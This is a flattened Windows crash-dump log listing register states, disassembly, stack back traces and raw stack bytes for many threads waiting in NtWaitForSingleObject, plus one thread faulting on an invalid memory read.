mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:030ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 020cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 020cff7c 6ff6b34a 00000014 78003820 00000014 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc5 eax=00150c28 ebx=00000000 ecx=021cf52c edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=021cfef0 ebp=021cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:031ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 021cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 021cff7c 6ff6b34a 00000015 78003820 00000015 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc6 eax=00000082 ebx=00000000 ecx=7803a180 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=022cfef0 ebp=022cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:032ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 022cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 022cff7c 6ff6b34a 00000016 78003820 00000016 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc7 eax=00000000 ebx=00000000 ecx=00000216 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=023cfef0 ebp=023cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:033ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 023cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 023cff7c 6ff6b34a 00000017 78003820 00000017 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc8 eax=00000000 ebx=00000000 ecx=0000031e edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=024cfef0 ebp=024cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:034ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 024cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 024cff7c 6ff6b34a 00000018 78003820 00000018 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xc9 eax=03dd88a8 ebx=00000000 ecx=025cffa8 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=025cfef0 ebp=025cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:035ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 025cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 025cff7c 6ff6b34a 00000019 78003820 00000019 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xca eax=00000000 ebx=00000000 ecx=00000101 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=026cfef0 ebp=026cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:036ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 026cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 026cff7c 6ff6b34a 0000001a 78003820 0000001a 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xcb eax=00000000 ebx=00000000 ecx=000001e6 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=027cfef0 ebp=027cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:037ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 027cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 027cff7c 6ff6b34a 0000001b 78003820 0000001b 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xcc eax=009b0078 ebx=00000000 ecx=00000101 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=028cfef0 ebp=028cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:038ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 028cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 028cff7c 6ff6b34a 0000001c 78003820 0000001c 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xcd eax=00000000 ebx=00000000 ecx=00000336 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=029cfef0 ebp=029cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:039ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 029cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 029cff7c 6ff6b34a 0000001d 78003820 0000001d 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xce eax=00000000 ebx=00000000 ecx=00000009 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=02acfef0 ebp=02acff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:03aee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 02acff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 02acff7c 6ff6b34a 0000001e 78003820 0000001e 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xcf eax=00000000 ebx=00000000 ecx=00003a01 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=02bcfef0 ebp=02bcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:03bee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 02bcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 02bcff7c 6ff6b34a 0000001f 78003820 0000001f 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd0 eax=00000000 ebx=00000000 ecx=00003601 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=02ccfef0 ebp=02ccff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:03cee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 02ccff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 02ccff7c 6ff6b34a 00000020 78003820 00000020 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd1 eax=00000001 ebx=00000000 ecx=00000000 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=02dcfef0 ebp=02dcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:03dee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 02dcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 02dcff7c 6ff6b34a 00000021 78003820 00000021 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd2 eax=00002dc0 ebx=00000000 ecx=007d8b00 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=02ecfef0 ebp=02ecff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:03eee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 02ecff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 02ecff7c 6ff6b34a 00000022 78003820 00000022 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd3 eax=6174732f ebx=6ff6a2a0 ecx=6174732f edx=009c65e0 esi=6ff8ee20 edi=000003cc eip=6ff8ee28 esp=02fcdca0 ebp=009bfe78 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 function: 6ff8ee19 5d pop ebp 6ff8ee1a 5b pop ebx 6ff8ee1b c20c00 ret 0xc 6ff8ee1e 90 nop 6ff8ee1f 90 nop 6ff8ee20 8b442404 mov eax,[esp+0x4] ss:03fec6a7=???????? 6ff8ee24 53 push ebx 6ff8ee25 55 push ebp 6ff8ee26 56 push esi 6ff8ee27 57 push edi FAULT ->6ff8ee28 8b7804 mov edi,[eax+0x4] ds:62765d35=???????? 6ff8ee2b 33ed xor ebp,ebp 6ff8ee2d 897c2414 mov [esp+0x14],edi ss:03fec6a7=???????? 6ff8ee31 8b07 mov eax,[edi] ds:000003cc=???????? 6ff8ee33 85c0 test eax,eax 6ff8ee35 7440 jz 6ff8ee77 6ff8ee37 8b542418 mov edx,[esp+0x18] ss:03fec6a7=???????? 6ff8ee3b 8b00 mov eax,[eax] ds:6174732f=???????? 6ff8ee3d 8bf2 mov esi,edx 6ff8ee3f 8a18 mov bl,[eax] ds:6174732f=?? 6ff8ee41 8acb mov cl,bl 6ff8ee43 3a1e cmp bl,[esi] ds:6ff8ee20=8b *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 009bfe78 03dd1058 2c697246 20353220 206e614a 32303032 *----> Raw Stack Dump <----* 02fcdca0 cc 03 00 00 20 ee f8 6f - 78 fe 9b 00 a0 a2 f6 6f .... ..ox......o 02fcdcb0 3a 5f 00 10 2f 73 74 61 - 9c 68 01 10 01 00 00 00 :_../sta.h...... 02fcdcc0 b3 ce f1 77 a0 a2 f6 6f - 00 64 00 10 f0 8b 7d 00 ...w...o.d....}. 02fcdcd0 50 86 97 00 00 10 00 00 - 60 00 7c 00 08 86 97 00 P.......`.|..... 02fcdce0 50 86 97 00 01 00 00 00 - 00 00 00 00 33 27 00 00 P...........3'.. 02fcdcf0 f0 8b 7d 00 0f 00 00 00 - 00 00 00 00 01 00 00 00 ..}............. 02fcdd00 cc 03 00 00 36 3c 02 00 - 00 00 00 00 00 5c 26 05 ....6<.......\&. 02fcdd10 00 00 00 00 58 17 35 cf - 82 0b 00 00 58 af 8d 03 ....X.5.....X... 02fcdd20 5b 63 f8 77 48 6b 90 00 - 70 dd fc 02 a0 6a 90 00 [c.wHk..p....j.. 02fcdd30 5b 63 f8 77 82 73 02 78 - 48 6b 90 00 48 6b 90 00 [c.w.s.xHk..Hk.. 02fcdd40 a0 6a 90 00 10 00 00 00 - e1 03 00 00 10 00 00 00 .j.............. 02fcdd50 70 00 00 00 00 00 00 00 - 66 00 00 00 61 5e f0 77 p.......f...a^.w 02fcdd60 18 00 00 00 70 dd fc 02 - 58 de fc 02 08 86 97 00 ....p...X....... 02fcdd70 1c df fc 02 01 00 00 00 - 19 00 00 00 10 00 00 00 ................ 02fcdd80 21 00 00 00 25 00 00 00 - 00 00 00 00 50 78 9a 00 !...%.......Px.. 02fcdd90 00 10 00 00 00 00 00 00 - 00 00 00 00 60 a7 03 78 ............`..x 02fcdda0 d8 00 00 00 50 78 9a 00 - d8 00 00 00 00 00 7b 00 ....Px........{. 02fcddb0 48 78 9a 00 00 00 00 00 - 00 00 00 00 54 00 00 00 Hx..........T... 02fcddc0 00 00 00 00 9c dd fc 02 - f8 dd fc 02 17 4e f6 77 .............N.w 02fcddd0 00 00 7b 00 48 78 9a 00 - f1 4e f6 77 48 05 7b 00 ..{.Hx...N.wH.{. State Dump for Thread Id 0xd4 eax=00001000 ebx=030cdb84 ecx=040f0000 edx=00000000 esi=00000000 edi=000003e4 eip=77f682db esp=030cdaf0 ebp=030cdb44 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:040ec4f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 030cdb44 77664a12 000003e4 000003c8 00000001 00000004 ntdll!NtWaitForSingleObject 030cdc6c 776b9f5f 00000040 030cdcfc 00000000 00000000 msafd! 030cdcbc 100063d7 00000040 030cdcfc 00000000 00000000 ws2_32!select *----> Raw Stack Dump <----* 030cdaf0 f3 87 66 77 e4 03 00 00 - 01 00 00 00 1c db 0c 03 ..fw............ 030cdb00 00 00 00 00 fc dc 0c 03 - 84 db 0c 03 00 00 00 00 ................ 030cdb10 00 00 00 00 00 00 00 00 - 00 00 00 00 c0 b4 b3 ff ................ 030cdb20 ff ff ff ff 33 27 00 00 - 00 00 00 00 ec da 0c 03 ....3'.......... 030cdb30 c3 49 66 77 c8 03 00 00 - e4 03 00 00 00 00 00 00 .Ifw............ 030cdb40 00 00 00 00 6c dc 0c 03 - 12 4a 66 77 e4 03 00 00 ....l....Jfw.... 030cdb50 c8 03 00 00 01 00 00 00 - 04 00 00 00 f0 1c 14 00 ................ 030cdb60 fc dc 0c 03 80 ae 13 00 - 80 2e 0f f7 ff ff ff ff ................ 030cdb70 01 00 00 00 00 52 df 03 - c8 03 00 00 19 00 00 00 .....R.......... 030cdb80 b4 db 0c 03 73 11 6d 77 - c8 03 00 00 a4 db 0c 03 ....s.mw........ 030cdb90 01 00 00 00 b0 db 0c 03 - ac db 0c 03 00 00 00 00 ................ 030cdba0 00 00 00 00 05 00 00 00 - 48 52 df 03 00 00 00 00 ........HR...... 030cdbb0 ff ff ff ff 48 52 df 03 - 07 01 a3 00 c8 03 00 00 ....HR.......... 030cdbc0 48 52 df 03 05 00 00 00 - 22 01 a3 00 00 00 00 00 HR......"....... 030cdbd0 0f 00 00 00 80 69 67 ff - 50 8b 7d 00 00 00 00 00 .....ig.P.}..... 030cdbe0 f6 ff ff ff 01 00 00 00 - 50 ad 7d 00 00 00 00 00 ........P.}..... 030cdbf0 05 00 00 00 df bf 9d 00 - 50 8b 7d 00 48 52 df 03 ........P.}.HR.. 030cdc00 05 00 00 00 17 00 00 00 - 00 40 00 00 70 db 0c 03 .........@..p... 030cdc10 2c 00 00 00 03 01 00 00 - 78 db 0c 03 05 00 00 00 ,.......x....... 030cdc20 05 00 00 00 00 00 00 00 - 00 10 00 00 50 ad 7d 00 ............P.}. State Dump for Thread Id 0xd5 eax=031cfddc ebx=00000000 ecx=007b04e0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=031cfef0 ebp=031cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:041ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 031cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 031cff7c 6ff6b34a 00000025 78003820 00000025 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd6 eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=032cfef0 ebp=032cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:042ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 032cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 032cff7c 6ff6b34a 00000026 78003820 00000026 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd7 eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=033cfef0 ebp=033cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:043ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 033cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 033cff7c 6ff6b34a 00000027 78003820 00000027 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd8 eax=034cfddc ebx=00000000 ecx=007b04e0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=034cfef0 ebp=034cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:044ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 034cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 034cff7c 6ff6b34a 00000028 78003820 00000028 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xd9 eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=035cfef0 ebp=035cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:045ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 035cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 035cff7c 6ff6b34a 00000029 78003820 00000029 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xda eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=036cfef0 ebp=036cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:046ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 036cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 036cff7c 6ff6b34a 0000002a 78003820 0000002a 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xdb eax=037cfddc ebx=00000000 ecx=007b04e0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=037cfef0 ebp=037cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:047ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 037cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 037cff7c 6ff6b34a 0000002b 78003820 0000002b 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xdc eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=038cfef0 ebp=038cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:048ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 038cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 038cff7c 6ff6b34a 0000002c 78003820 0000002c 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xdd eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=039cfef0 ebp=039cff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:049ee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 039cff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 039cff7c 6ff6b34a 0000002d 78003820 0000002d 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xde eax=03acfddc ebx=00000000 ecx=007b04e0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=03acfef0 ebp=03acff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:04aee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 03acff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 03acff7c 6ff6b34a 0000002e 78003820 0000002e 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xdf eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=03bcfef0 ebp=03bcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:04bee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 03bcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 03bcff7c 6ff6b34a 0000002f 78003820 0000002f 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xe0 eax=00002008 ebx=00000000 ecx=007b0010 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=03ccfef0 ebp=03ccff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:04cee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 03ccff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 03ccff7c 6ff6b34a 00000030 78003820 00000030 00000000 kernel32!WaitForSingleObject State Dump for Thread Id 0xe1 eax=03dcfddc ebx=00000000 ecx=007b04e0 edx=00000000 esi=000001d4 edi=00000000 eip=77f682db esp=03dcfef0 ebp=03dcff14 iopl=0 nv up ei pl zr na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000246 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:04dee8f7=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 03dcff14 77f04f37 000001d4 ffffffff 00000000 6ff857cd ntdll!NtWaitForSingleObject 03dcff7c 6ff6b34a 00000031 78003820 00000031 00000000 kernel32!WaitForSingleObject *----> Raw Stack Dump <----* 03dcfef0 a0 cc f1 77 d4 01 00 00 - 00 00 00 00 00 00 00 00 ...w............ 03dcff00 00 00 00 00 20 47 99 00 - d0 e5 13 00 7c ff dc 03 .... G......|... 03dcff10 37 4f f0 77 7c ff dc 03 - 37 4f f0 77 d4 01 00 00 7O.w|...7O.w.... 03dcff20 ff ff ff ff 00 00 00 00 - cd 57 f8 6f d4 01 00 00 .........W.o.... 03dcff30 ff ff 